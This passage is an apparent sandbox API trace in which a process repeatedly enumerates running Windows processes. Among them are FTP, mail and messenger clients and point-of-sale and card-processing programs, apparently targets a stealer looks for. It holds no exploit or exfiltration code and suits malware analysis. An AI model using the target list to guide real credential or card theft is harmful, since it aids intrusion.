th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0209.771] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0209.773] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0209.775] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0209.779] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0209.781] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0209.783] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0209.784] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0209.786] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0209.788] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0209.789] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0209.791] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0209.799] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0209.803] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0209.806] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0209.827] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0209.829] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0209.831] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0209.832] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0209.834] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0209.835] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0209.837] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0209.841] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0209.843] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0209.845] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0209.847] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0209.848] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.850] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.852] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0209.853] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0209.861] CloseHandle (hObject=0xde8) returned 1 [0209.861] Sleep (dwMilliseconds=0x64) [0209.995] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0210.008] Process32First (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.010] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0210.037] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0210.039] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.040] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0210.042] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.047] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0210.049] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0210.050] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0210.052] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.054] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.055] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0210.057] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.079] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.080] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.082] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.084] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.085] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.087] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.088] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0210.092] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0210.094] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0210.096] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.097] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.099] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0210.100] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0210.102] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0210.103] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0210.108] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.109] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0210.111] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0210.112] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.114] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0210.115] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0210.117] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0210.118] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0210.154] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0210.156] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0210.158] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0210.160] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0210.161] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0210.163] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0210.164] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0210.166] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0210.172] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0210.175] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0210.177] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0210.179] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0210.181] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0210.182] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0210.187] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0210.189] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0210.191] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0210.192] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0210.194] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: 